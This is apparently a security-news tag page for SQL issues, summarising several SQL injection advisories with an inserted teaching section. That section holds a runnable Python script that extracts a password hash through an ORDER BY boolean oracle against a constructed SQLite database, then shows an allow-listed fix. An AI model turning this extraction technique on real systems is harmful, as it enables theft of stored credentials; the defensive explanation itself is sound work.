Tag

#sql

GHSA-xc69-p8fc-m6m5: silverstripe/subsites Unsafe SQL Query Construction (Safe Data Source)

A low-severity potential SQL injection vulnerability in the silverstripe/subsites module has been identified and fixed in version 2.1.1.

GHSA-p2v5-xcqm-4fv6: silverstripe/taxonomy SQL Injection vulnerability

There is a vulnerability in the silverstripe/taxonomy module that allows SQL injection. The affected controller (`TaxonomyDirectoryController`) is disabled by default and must be enabled by a developer for the exploit to be possible.

GHSA-265q-222x-52m6: silverstripe/framework has potential SQL Injection vulnerability in PostgreSQL database connector

A potential SQL injection vulnerability was identified in the silverstripe/postgresql database adapter. While unlikely to be exploitable, silverstripe/framework has been patched to ensure that table names are safely escaped before being passed to database adapters or user code.

GHSA-m2hh-2m46-x6j5: silverstripe/framework may disclose database credentials during connection failure

When running SilverStripe 3.7 or 4.x in dev mode with the mysqli database driver, the database connection details can be disclosed in stack traces when a database error occurs. The sensitive parts of the connection information are now excluded from dev-mode stack traces.

GHSA-xx4r-5265-48j6: silverstripe/framework SQL injection in full text search

When performing a full-text search in SilverStripe 4.0.0, the 'start' query-string parameter is never escaped safely, exposing a possible SQL injection vulnerability. The issue also exists in 3.5 and 3.6 but is harder to exploit there, as SearchForm sanitises these variables before passing them to MySQL.

How to Recover Deleted Emails from Exchange Server?

By Waqas. Accidentally deleted emails? Don’t panic! This guide explains how to recover them from Exchange Server within the retention… Originally published on HackRead.com: How to Recover Deleted Emails from Exchange Server?

GHSA-q8x7-jc3h-p8xc: Dolibarr vulnerable to SQL Injection

Dolibarr ERP/CRM version 9.0.1 contains SQL injection vulnerabilities. A remote attacker could send a specially crafted SQL query through the parameters of /dolibarr/commande/list.php and retrieve all the information stored in the database.

GHSA-c3h9-q3jx-w7fc: Dolibarr vulnerable to SQL Injection

Dolibarr ERP/CRM version 9.0.1 contains SQL injection vulnerabilities. A remote attacker could send a specially crafted SQL query through the sortorder and sortfield parameters of /dolibarr/admin/dict.php and retrieve all the information stored in the database.
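The sortorder and sortfield parameters in this advisory, like the unescaped 'start' parameter in the SilverStripe full-text search advisory earlier on this page, belong to the bug class where bind parameters alone do not help: a column name, a sort direction, or a clause keyword cannot be passed as a placeholder, so it must be allow-listed and numeric offsets must be cast before binding. The following is an added example written for this page, not code from Dolibarr or SilverStripe. It uses a constructed in-memory SQLite schema to show a list endpoint that splices the three parameters into the SQL, an extraction of a secret through the ORDER BY clause alone (sort direction as a boolean oracle, no error message and no UNION needed), and a hardened version of the same query. The table names, rows, function names, and the secret value are all assumptions.

```python
import sqlite3

# Constructed sample schema and rows for the demonstration (assumption, not
# data from any advisory on this page).
SCHEMA = """
CREATE TABLE orders (id INTEGER PRIMARY KEY, ref TEXT, total REAL);
CREATE TABLE users  (id INTEGER PRIMARY KEY, login TEXT, pass_hash TEXT);
INSERT INTO orders VALUES (1, 'CO2401', 300.0), (2, 'CO2402', 75.5), (3, 'CO2403', 120.0);
INSERT INTO users  VALUES (1, 'admin', 'hash-of-admin-secret');
"""


def open_db():
    """Fresh in-memory database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_orders_vulnerable(conn, sortfield, sortorder, start):
    """The bug class: request parameters spliced straight into the SQL text."""
    sql = (f"SELECT ref, total FROM orders "
           f"ORDER BY {sortfield} {sortorder} LIMIT 10 OFFSET {start}")
    return conn.execute(sql).fetchall()


def leak_admin_hash(conn, max_len=32):
    """Boolean-oracle extraction through the ORDER BY clause alone.

    The injected expression sorts by `ref` when the guessed character is right
    and by `total` otherwise, so the first row returned tells the attacker
    whether the guess was correct.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            cond = (f"substr((SELECT pass_hash FROM users WHERE id = 1), {pos}, 1)"
                    f" = '{ch}'")
            payload = f"CASE WHEN {cond} THEN ref ELSE total END"
            rows = list_orders_vulnerable(conn, payload, "ASC", "0")
            if rows[0][0] == "CO2401":      # sorted by ref: guess was right
                recovered += ch
                break
        else:
            break                           # nothing matched: end of string
    return recovered


# Allow-lists for the parts of the statement that cannot be bound.
ALLOWED_SORT_FIELDS = {"ref", "total"}
ALLOWED_SORT_ORDERS = {"ASC", "DESC"}


def list_orders_hardened(conn, sortfield, sortorder, start):
    """Identifiers and keywords are allow-listed; the offset is cast and bound."""
    if sortfield not in ALLOWED_SORT_FIELDS:
        raise ValueError(f"invalid sortfield: {sortfield!r}")
    order = str(sortorder).upper()
    if order not in ALLOWED_SORT_ORDERS:
        raise ValueError(f"invalid sortorder: {sortorder!r}")
    try:
        offset = int(start)
    except (TypeError, ValueError):
        raise ValueError(f"invalid start: {start!r}") from None
    if offset < 0:
        raise ValueError(f"invalid start: {start!r}")
    sql = (f"SELECT ref, total FROM orders "
           f"ORDER BY {sortfield} {order} LIMIT 10 OFFSET ?")
    return conn.execute(sql, (offset,)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("leaked via ORDER BY oracle:", leak_admin_hash(db))
    print("hardened, legitimate call:", list_orders_hardened(db, "total", "desc", "0"))
    for bad in ({"sortfield": "ref, total"}, {"sortorder": "ASC, 1"}, {"start": "0 OR 1=1"}):
        args = {"sortfield": "ref", "sortorder": "ASC", "start": "0", **bad}
        try:
            list_orders_hardened(db, **args)
        except ValueError as e:
            print("hardened rejected:", e)
```

The extraction loop needs nothing but the ordinary list response, which is why a sort parameter is worth as much to an attacker as a WHERE clause: every request leaks one bit through the row order. The hardened version keeps the column name in the SQL text only after it has been matched against a fixed set, and never trusts the direction or offset strings.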

Red Hat Security Advisory 2024-3313-03

Red Hat Security Advisory 2024-3313-03 - An update for postgresql-jdbc is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

Ivanti Patches Critical Remote Code Execution Flaws in Endpoint Manager

Ivanti on Tuesday rolled out fixes to address multiple critical security flaws in Endpoint Manager (EPM) that could be exploited to achieve remote code execution under certain circumstances. Six of the 10 vulnerabilities – from CVE-2024-29822 through CVE-2024-29827 (CVSS scores: 9.6) – relate to SQL injection flaws that allow an unauthenticated attacker within the same network to